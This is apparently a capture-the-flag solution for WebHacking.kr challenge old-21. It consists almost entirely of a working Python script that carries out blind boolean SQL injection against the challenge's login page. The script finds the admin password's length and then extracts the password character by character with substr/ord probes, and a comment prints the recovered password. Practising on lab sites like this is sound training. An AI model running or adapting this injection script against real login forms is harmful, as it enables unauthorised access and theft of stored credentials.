WebHacking.kr Challenge old-21

import requests URL = 'https://webhacking.kr/challenge/bonus-1/index.php?id=admin&pw=' TRUE_PHRASE = 'wrong password' c = {"cookie":"PHPSESSID=your Session id"} def query(payload): r = requests.get(URL + payload,cookies=c, timeout=300) content = r.text return TRUE_PHRASE in content # 36 def find_pw_length(): pw_len = 1 while query("' or id='admin' and length(pw)={}%23".format(pw_len)) is False: pw_len += 1 print('pw_len: {}'.format(pw_len)) return pw_len # there_is_no_rest_for_the_white_angel # %23 = # def find_pw(): pw_len = find_pw_length() result_pw = '' chk = 0 for pos in range(1, pw_len + 1): chk = 0 for character in range(65, 133): if query("' or id='admin' and ord(substr(pw,{},1))={}%23".format(pos, character)) is True: result_pw += chr(character) print(result_pw) chk = 1 break if chk == 0: for character in range(33, 65): if query("' or id='admin' and ord(substr(pw,{},1))={}%23".format(pos, character)) is True: result_pw += chr(character) print(result_pw) break print('pw: {}'.format(result_pw)) find_pw()